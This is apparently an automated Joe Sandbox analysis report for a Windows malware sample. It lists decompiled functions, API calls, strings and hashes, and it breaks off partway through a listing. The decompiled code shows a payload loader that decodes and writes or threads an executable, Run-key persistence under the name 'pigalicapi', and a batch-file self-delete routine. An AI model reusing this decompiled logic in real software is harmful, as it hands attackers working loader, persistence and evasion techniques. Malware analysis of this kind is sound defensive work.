0x04002521
0x040026c2
0x00000000
0x04002531
0x0400253a
0x0400254b
0x04002554
0x0400256a
0x04002571
0x04002596
0x0400259d
0x040025d7
0x040025e6
0x040025eb
0x040025ee
0x04002600
0x0400263c
0x04002641
0x040025fd
0x040025fd
0x0400264e
0x04002670
0x04002692
0x04002698
0x040026bf
0x00000000
0x040026bf
0x0400267d
0x00000000
0x04002683
0x040025b6
0x040025bd
0x00000000
0x00000000
0x040025ca
0x00000000
0x040025d0
0x00000000
0x04002573

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Virtual$Alloc$Free
String ID:
API String ID: 3668210933-0
Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D450 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0040D488
GetCurrentProcessId.KERNEL32 ref: 0040D499
GetCurrentThreadId.KERNEL32 ref: 0040D4A1
GetTickCount.KERNEL32 ref: 0040D4AA
QueryPerformanceCounter.KERNEL32 ref: 0040D4B9

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
Instruction ID: f7418f5e27814e582490d40679fb3d8e681102d975b17fa56a29dd6ac314bc8c
Opcode Fuzzy Hash: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
Instruction Fuzzy Hash: 1711B27AD002188BCB109FB9E9885DEFBB4FB4C364F854536D805B7210DB3569198B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4FC Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
GetCurrentProcess.KERNEL32 ref: 0040D568
TerminateProcess.KERNEL32 ref: 0040D579
abort.MSVCRT ref: 0040D582

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
Instruction ID: 9824e27efd6e7c83b31d16d0cbecc9548462bee31ea0de24143adee51b232729
Opcode Fuzzy Hash: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
Instruction Fuzzy Hash: 8901ACB4A04304DFD710EF79EA495597BF0FB04304F818939ED9997220E7B45556CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D500 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
GetCurrentProcess.KERNEL32 ref: 0040D568
TerminateProcess.KERNEL32 ref: 0040D579
abort.MSVCRT ref: 0040D582

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
Instruction ID: 01619bb876d6b6a6ce0892675db8caf066cd75de0a22c9d772086659f3caa19f
Opcode Fuzzy Hash: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
Instruction Fuzzy Hash: F701A8B4A04304DFD710EF7AEA495597BF0FB04304F818A39ED8997220E7B85556CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 00401E50 Relevance: 3.0, APIs: 2, Instructions: 28
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E50(signed int __eax) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t10;
				intOrPtr* _t15;
				intOrPtr* _t16;

				_v20 = 0;
				_v24 = 0;
				 *_t15 = 0;
				L00404F5C();
				_t16 = _t15 - 0xc;
				_t10 = __eax & 0xffffff00 | __eax == 0x00000000;
				if(_t10 == 0) {
					_v32 = 0;
					_v36 = 0;
					 *_t16 = 0;
					L00404F5C();
					if((_t10 & 0xffffff00 | _t10 == 0x00000000) == 0) {
						return 0;
					}
					return 1;
				}
				return 1;
			}

0x00401e56
0x00401e5e
0x00401e66
0x00401e6d
0x00401e72
0x00401e77
0x00401e7c
0x00401e85
0x00401e8d
0x00401e95
0x00401e9c
0x00401eab
0x00000000
0x00401eb4
0x00000000
0x00401ead
0x00000000

APIs

ZwOpenSymbolicLinkObject.NTDLL ref: 00401E6D
ZwOpenSymbolicLinkObject.NTDLL ref: 00401E9C

Memory Dump Source

Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: LinkObjectOpenSymbolic
String ID:
API String ID: 3706036087-0
Opcode ID: 1ce86b054a603b6eaab08c5c754c87037e059b9d76325e10417d63c02768b84f
Instruction ID: dc50c365ff92ddb02f3a77bb4394c433765aadc07f1f97dea54c6a81e4aa1f8d
Opcode Fuzzy Hash: 1ce86b054a603b6eaab08c5c754c87037e059b9d76325e10417d63c02768b84f
Instruction Fuzzy Hash: 89F0EDB010930196E7007F75D24535B7AE49B80348F00453EEE89AB3D6DBBDC84987CB

Uniqueness

Uniqueness Score: -1.00%

Function 00E609FC Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649432754.0000000000E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda46960d40e5069d9d85ddddae04929f816436dd0746330b63fa234edf94fde
Instruction ID: f00d5530f6cb6e510e01d7bd9319965ab0a8cc3d807ab60b69815b871e6b19b8
Opcode Fuzzy Hash: fda46960d40e5069d9d85ddddae04929f816436dd0746330b63fa234edf94fde
Instruction Fuzzy Hash: FF31BF75A087268FDB50DF58D8C0D26B7E4FF89394B0514A9E8809B312E730EC05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00417380 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d68cdb25bd860636420cb464b12059b347e46f809f98f5638d4cc3509d77f857
Instruction ID: e0c1f48c15c03355e32f8fb246acf246ea8422a10dedd0577e515afab30cd0ef
Opcode Fuzzy Hash: d68cdb25bd860636420cb464b12059b347e46f809f98f5638d4cc3509d77f857
Instruction Fuzzy Hash: 54C08C70C093008BC2007F38A506028BEF26F12308FC428EEE84413222E739845846AF

Uniqueness

Uniqueness Score: -1.00%

Function 04003090 Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E04003090() {

				asm("lodsd");
				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
			}

0x0400309f
0x040030a4

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40

Uniqueness

Uniqueness Score: -1.00%

Function 00404A1C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
Instruction ID: c44a3771f1df941e5b7939865c0dfe98d38faecbb3f8320e7e088cb6d49b5c59
Opcode Fuzzy Hash: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00404CA6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
Instruction ID: c44a3771f1df941e5b7939865c0dfe98d38faecbb3f8320e7e088cb6d49b5c59
Opcode Fuzzy Hash: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 040074A0 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 195
stringregistryfileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E040074A0() {
				char _v524;
				CHAR* _v528;
				void* _v532;
				void* _v536;
				void* _v540;
				char _v1060;
				char _v1580;
				char _v2364;
				long _v2368;
				struct _PROCESS_INFORMATION _v2384;
				long _v2388;
				struct _STARTUPINFOA _v2460;
				void* _t86;
				void* _t121;
				void* _t123;
				void* _t124;

				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
				_t123 = _t121 + 0x18;
				 *0x4014370 = 1;
				Sleep(0x3e8);
				if(( *0x4014362 & 0x000000ff) != 0) {
					_v2368 = 0x207;
					if(( *0x401435a & 0x000000ff) == 0) {
						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
					} else {
						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
					}
					lstrcatA( &_v1060, "\\");
					lstrcatA( &_v1060, "pigalicapi");
					lstrcatA( &_v1060, ".exe");
				} else {
					GetModuleFileNameA(0,  &_v1060, 0x207);
				}
				SetFileAttributesA( &_v1060, 0x80);
				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
				_t124 = _t123 + 0x14;
				if( *0x401436c != 0) {
					_t86 =  *0x401436c; // 0x2dc
					TerminateThread(_t86, 1);
				}
				_v528 = "software\\microsoft\\windows\\currentversion\\run";
				_v532 = 0x80000001;
				if(( *0x401435a & 0x000000ff) != 0) {
					_v532 = 0x80000002;
				}
				_v536 = 0;
				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
					RegDeleteValueA(_v536, "pigalicapi");
					RegCloseKey(_v536);
				}
				if(( *0x401435b & 0x000000ff) != 0) {
					E04005E30(1);
					_t124 = _t124 + 4;
				}
				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
				lstrcatA( &_v524, ".bat");
				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
				_v540 = _t71;
				if(_v540 != 0xffffffff) {
					_v2388 = 0;
					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
					_v2460.cb = 0x44;
					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
					_v2460.wShowWindow = 0;
					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
						_t71 = CloseHandle(_v2384.hThread);
					}
					ExitProcess(0);
				}
				return _t71;
			}

0x040074cd
0x040074d2
0x040074d5
0x040074e4
0x040074f3
0x0400750b
0x0400751e
0x04007547
0x04007520
0x0400752e
0x0400752e
0x04007559
0x0400756b
0x0400757d
0x040074f5
0x04007503
0x04007503
0x0400758f
0x040075b4
0x040075ba
0x040075c4
0x040075c8
0x040075ce
0x040075ce
0x040075d4
0x040075de
0x040075f1
0x040075f3
0x040075f3
0x040075fd
0x04007628
0x04007636
0x04007643
0x04007643
0x04007652
0x04007656
0x0400765b
0x0400765b
0x0400766f
0x04007698
0x040076aa
0x040076c6
0x040076cc
0x040076d9
0x040076df
0x0400770e
0x0400773f
0x04007747
0x0400775a
0x04007762
0x04007794
0x0400779d
0x0400779d
0x040077a5
0x040077a5
0x040077ae

APIs

Sleep.KERNEL32(000003E8), ref: 040074E4
GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
lstrcatA.KERNEL32(?,0400C650), ref: 04007559
lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
lstrcatA.KERNEL32(?,.exe), ref: 0400757D
SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
wnsprintfA.SHLWAPI ref: 040075B4
TerminateThread.KERNEL32(000002DC,00000001), ref: 040075CE
RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
RegCloseKey.ADVAPI32(00000000), ref: 04007643
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
GetTickCount.KERNEL32 ref: 0400767C
GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
lstrcatA.KERNEL32(?,.bat), ref: 040076AA
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
CloseHandle.KERNEL32(000000FF), ref: 0400771B
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
CloseHandle.KERNEL32(?), ref: 0400779D
ExitProcess.KERNEL32 ref: 040077A5

Strings

:repeatdel %sif exist %s goto :repeatdel %%0, xrefs: 040075A3
D, xrefs: 04007747
.bat, xrefs: 0400769E
slf, xrefs: 0400768C
pigalicapi, xrefs: 0400755F, 0400762A
TEMP, xrefs: 0400766A
.exe, xrefs: 04007571
USERPROFILE, xrefs: 04007542

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
API String ID: 3221898725-336785456
Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04006DA0 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 354
memoryfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E04006DA0(intOrPtr* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				long _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v324;
				void* _v328;
				char _v340;
				char _v604;
				long _v608;
				int _v612;
				long _v616;
				void* _v620;
				long _v624;
				intOrPtr _v628;
				void* _v632;
				intOrPtr _t198;
				struct _SECURITY_ATTRIBUTES* _t217;
				void* _t223;
				struct _SECURITY_ATTRIBUTES* _t248;
				void* _t347;
				void* _t349;
				void* _t350;

				_v8 = _a4;
				if(_v8 == 0) {
					L39:
					return 0;
				}
				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
				__imp__CoInitialize(0);
				_v32 =  *_v8;
				_v28 =  *((intOrPtr*)(_v8 + 4));
				_v24 =  *((intOrPtr*)(_v8 + 8));
				_v12 =  *(_v8 + 0x14);
				_v20 =  *(_v8 + 0xc);
				_v16 =  *((intOrPtr*)(_v8 + 0x10));
				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
					E04007D20( &_v340,  &_v340, 0, 0xa);
					E04009730( &_v340, 4);
					_t349 = _t347 + 0x14;
					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
					if(_v328 != 0xffffffff) {
						_v608 = 0;
						_v612 = 0;
						_v616 =  *(_v8 + 0x1c);
						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
						} else {
							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
							if(_v620 != 0) {
								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
									_v616 = _v624;
								}
								VirtualFree(_v620, 0, 0x8000);
							}
						}
						CloseHandle(_v328);
						if(_v612 != 0 && _v608 == _v616) {
							_t198 = E04001E60( &_v324);
							_t350 = _t349 + 4;
							_v628 = _t198;
							if(_v628 != 0) {
								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
									_t350 = _t350 + 0xc;
								}
								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
									E04002510(_v628, 0x400e290);
								}
							}
						}
					}
					L38:
					__imp__CoUninitialize();
					goto L39;
				}
				_v40 = 0;
				_v36 = 0;
				_v44 = 0;
				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
					_t217 = E04002070( *(_v8 + 0x18));
					_t347 = _t347 + 4;
					_v40 = _t217;
				} else {
					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
					if(_v48 != 0) {
						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
							_t248 = E04002070(_v48);
							_t347 = _t347 + 4;
							_v40 = _t248;
							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
								E04007B70(_v36, _v48, _v44);
								_t347 = _t347 + 0xc;
							}
						}
						VirtualFree(_v48, 0, 0x8000);
					}
				}
				if(_v40 == 0) {
					L22:
					goto L38;
				} else {
					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
						_t347 = _t347 + 0xc;
					}
					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
						_t223 = E040097A0(0x10);
						_t347 = _t347 + 4;
						_v632 = _t223;
						_v52 = _v632;
						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
							if( *_v52 != 0) {
								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
								_t347 = _t347 + 0xc;
								 *(_v52 + 4) =  *(_v8 + 0x1c);
							}
						} else {
							 *_v52 = _v36;
							 *(_v52 + 4) = _v44;
						}
						if( *_v52 != 0) {
							 *(_v52 + 8) =  *(_v8 + 0xc);
							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
							CloseHandle(_v56);
						}
					}
					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
						E04002510(_v40, 0x400e290);
					}
					goto L22;
				}
			}

0x04006dac
0x04006db3
0x0400723f
0x04007244
0x04007244
0x04006dc9
0x04006dd1
0x04006ddc
0x04006de5
0x04006dee
0x04006df7
0x04006e00
0x04006e09
0x04006e15
0x04007028
0x04007039
0x0400704a
0x0400704f
0x04007077
0x04007099
0x040070a6
0x040070ac
0x040070b6
0x040070c6
0x040070d5
0x040071af
0x040070db
0x040070eb
0x04007107
0x04007114
0x0400713d
0x04007163
0x0400716f
0x0400716f
0x04007183
0x04007183
0x04007189
0x040071bc
0x040071c9
0x040071e0
0x040071e5
0x040071e8
0x040071f5
0x040071fe
0x04007212
